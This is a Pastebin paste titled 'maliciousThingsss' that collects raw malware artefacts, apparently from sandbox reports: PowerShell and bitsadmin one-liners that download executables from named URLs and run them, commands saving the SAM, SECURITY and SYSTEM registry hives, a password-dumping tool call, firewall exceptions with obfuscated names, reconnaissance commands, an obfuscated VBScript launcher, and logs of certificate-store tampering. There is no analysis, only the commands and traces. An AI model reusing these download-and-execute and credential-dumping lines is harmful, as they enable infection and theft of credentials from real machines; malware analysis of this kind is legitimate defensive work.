Advertisement
opexxx

maliciousThingsss

Nov 4th, 2016
332
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.32 KB | None | 0 0
  1. "cmd /c "echo.>Windows_10_Activator_by_T3am_R3d_v1.7_2016.exe:Zone.Identifier""
  2.  
  3. " /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://mnmassagetherapy.com/wp-content/uploads/2016/04/88th0310_nw.exe','mess.exe');Start-Process 'mess.exe'"
  4.  
  5. GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \''+TYXetqZSGF+'\'');
  6.  
  7. Set qYdIRkazmpwLrkmIp = Createobject("WScRiPt.shelL")
  8. QYDiRkAzMPWLRkmIP.rUN """C:\Users\CwDYSF1\AppData\Roaming\Microsoft\log\securityscan.exe"""
  9.  
  10. integration SKPol
  11. network
  12. fwmanagement
  13.  
  14.  
  15. cmd.exe /r powershell -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://4thkantonind.top/egypt/hashish/afghankush.php','%TEMP%\calc.exe');Start '%TEMP%\calc.exe';
  16. %WINDIR%\system32\wbem\wmiprvse.exe -secured -Embeddin
  17. regasm.exe
  18. hh.exe
  19.  
  20. "/c bitsadmin /transfer myjob /download /priority high "http://cta.edu.pe/real/let.exe" "%temp%\ltesih.jpg" >nul & "%temp%\ltesih.jpg" & exit" on 2016-9-16.04:29:00.000
  21.  
  22. Copyright 1995-2012 Mark Adler
  23. %WINDIR%\system32\cmd.exe /c "reg.exe save hklm\sam sam.save"
  24. %WINDIR%\system32\cmd.exe /c "reg.exe save hklm\security security.save"
  25. %WINDIR%\system32\cmd.exe /c "reg.exe save hklm\system system.save"
  26. %WINDIR%\system32\cmd.exe /c %APPDATA%\Microsoft\log\pass.exe all
  27. %WINDIR%\system32\cmd.exe /c netsh firewall add allowedprogram program = STcONaURjstoJeQ(uMqeEfSfaGeNmho("yJmAEIBBXdvRXSFRGegUiJnA")) name = STcONaURjstoJeQ(uMqeEfSfaGeNmho("XQ0V1bwVGZ0FQZ==")) mode = ENABLE
  28. %WINDIR%\system32\cmd.exe /c taskkill /f /im chrome.exe
  29. %WINDIR%\system32\cmd.exe /k HOSTNAME
  30. %WINDIR%\system32\cmd.exe /k ipconfig
  31. %WINDIR%\system32\cmd.exe /k systeminfo
  32.  
  33. Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh firewall add allowedprogram program = STcONaURjstoJeQ(uMqeEfSfaGeNmho("yJmAEIBBXdvRXSFRGegUiJnA")) name = STcONaURjstoJeQ(uMqeEfSfaGeNmho("XQ0V1bwVGZ0FQZ==")) mode = ENABLE" (UID: 00032217-00003856)
  34. Spawned process "netsh.exe" with commandline "netsh firewall add allowedprogram program = STcONaURjstoJeQ(uMqeEfSfaGeNmho("yJmAEIBBXdvRXSFRGegUiJnA")) name = STcONaURjstoJeQ(uMqeEfSfaGeNmho("XQ0V1bwVGZ0FQZ==")) mode = ENABLE" (UID: 00032623-00003972)
  35. Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c taskkill /f /im chrome.exe" (UID: 00036046-00002100)
  36. Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c %APPDATA%\Microsoft\log\pass.exe all" (UID: 00036050-00000496)
  37. Spawned process "pass.exe" with commandline "all" (UID: 00036516-00001992)
  38. Spawned process "taskkill.exe" with commandline "taskkill /f /im chrome.exe" (UID: 00036541-00002228)
  39. Spawned process "pass.exe" with commandline "all" (UID: 00038175-00002296)
  40. Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c "reg.exe save hklm\sam sam.save"" (UID: 00039208-00001444)
  41. Spawned process "reg.exe" with commandline "save hklm\sam sam.save" (UID: 00039409-00001940)
  42. Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c "reg.exe save hklm\security security.save"" (UID: 00039658-00002556)
  43. Spawned process "reg.exe" with commandline "save hklm\security security.save" (UID: 00039867-00002588)
  44. "%WINDIR%\system32\cmd.exe /k HOSTNAME" on 2016-10-24.09:06:00.610
  45. "%WINDIR%\system32\cmd.exe /c netsh firewall add allowedprogram program = STcONaURjstoJeQ(uMqeEfSfaGeNmho("yJmAEIBBXdvRXSFRGegUiJnA")) name = STcONaURjstoJeQ(uMqeEfSfaGeNmho("XQ0V1bwVGZ0FQZ==")) mode = ENABLE" on 2016-10-24.09:16:00.180
  46. "%WINDIR%\system32\cmd.exe /c taskkill /f /im chrome.exe" on 2016-10-24.09:52:00.540
  47. "%WINDIR%\system32\cmd.exe /c %APPDATA%\Microsoft\log\pass.exe all" on 2016-10-24.09:52:00.600
  48. "%WINDIR%\system32\cmd.exe /c "reg.exe save hklm\sam sam.save"" on 2016-10-24.10:23:00.500
  49. "%WINDIR%\system32\cmd.exe /c "reg.exe save hklm\security security.save"" on 2016-10-24.10:27:00.901
  50. "%WINDIR%\system32\cmd.exe /c "reg.exe save hklm\system system.save"" on 2016-10-24.10:32:00.410
  51. "%WINDIR%\system32\cmd.exe /k systeminfo" on 2016-10-24.10:48:00.120
  52. "%WINDIR%\system32\cmd.exe /k ipconfig" on 2016-10-24.11:20:00.670
  53. "%WINDIR%\system32\cmd.exe /k HOSTNAME" on 2016-10-24.11:39:00.300
  54.  
  55.  
  56.  
  57.  
  58. Reads Windows Trust Settings
  59. details
  60. "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINTRUST\TRUST PROVIDERS\SOFTWARE PUBLISHING"; Key: "STATE")
  61.  
  62. "Pa_001.exe" issued a query "Select * from AntiVirusProduct"
  63. "taskkill.exe" issued a query "SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")0"
  64. "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION"; Key: "INSTALLDATE")
  65.  
  66. "securityscan.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\8AD5C9987E6F190BD6F5416E2DE44CCD641D8CDA"; Key: "BLOB")
  67. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\109F1CAED645BB78B3EA2B94C0697C740733031C"; Key: "BLOB")
  68. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\D559A586669B08F46A30A133F8A9ED3D038E2EA8"; Key: "BLOB")
  69. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\FEE449EE0E3965A5246F000E87FDE2A065FD89D4"; Key: "BLOB")
  70. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS\A377D1B1C0538833035211F4083D00FECC414DAB"; Key: "BLOB")
  71. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6"; Key: "BLOB")
  72. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES\7D7F4414CCEF168ADF6BF40753B5BECD78375931"; Key: "BLOB")
  73. "securityscan.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\PROTECTEDROOTS"; Key: "CERTIFICATES")
  74. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\18F7C1FCC3090203FD5BAA2F861A754976C8DD25"; Key: "BLOB")
  75. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\245C97DF7514E7CF2DF8BE72AE957B9E04741E85"; Key: "BLOB")
  76. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\7F88CD7223F3C813818C994614A89C99FA3B5247"; Key: "BLOB")
  77. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\A43489159A520F0D93D032CCAF37E7FE20A8B419"; Key: "BLOB")
  78. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\BE36A4562FB2EE05DBB3D32323ADF445084ED656"; Key: "BLOB")
  79.  
  80.  
  81. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
  82. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
  83. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
  84. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
  85. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
  86. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
  87. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
  88. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
  89. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
  90. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
  91. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
  92. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
  93. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
  94. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
  95. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
  96. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
  97. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT")
  98. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES")
  99. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS")
  100. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS")
  101.  
  102.  
  103. "<Input Sample>" monitors "\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\crypt32" (Filter: 4)
  104. "<Input Sample>" monitors "HKCU\Software\Microsoft\SystemCertificates\Root" (Filter: 5; Subtree: 1)
  105. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT" (Filter: 5; Subtree: 1)
  106. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot" (Filter: 5; Subtree: 1)
  107. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates" (Filter: 5; Subtree: 1)
  108. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root" (Filter: 5; Subtree: 1)
  109. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot" (Filter: 5; Subtree: 1)
  110. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Microsoft\SystemCertificates\SmartCardRoot" (Filter: 5; Subtree: 1)
  111. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Microsoft\SystemCertificates\trust" (Filter: 5; Subtree: 1)
  112. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Policies\Microsoft\SystemCertificates" (Filter: 5; Subtree: 1)
  113. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust" (Filter: 5; Subtree: 1)
  114. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust" (Filter: 5; Subtree: 1)
  115. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Microsoft\SystemCertificates\CA" (Filter: 5; Subtree: 1)
  116. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA" (Filter: 5; Subtree: 1)
  117. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA" (Filter: 5; Subtree: 1)
  118. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Microsoft\SystemCertificates\Disallowed" (Filter: 5; Subtree: 1)
  119. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed" (Filter: 5; Subtree: 1)
  120. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed" (Filter: 5; Subtree: 1)
  121. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Microsoft\SystemCertificates\TrustedPeople" (Filter: 5; Subtree: 1)
  122. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople" (Filter: 5; Subtree: 1)
  123.  
  124.  
  125. End Function"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement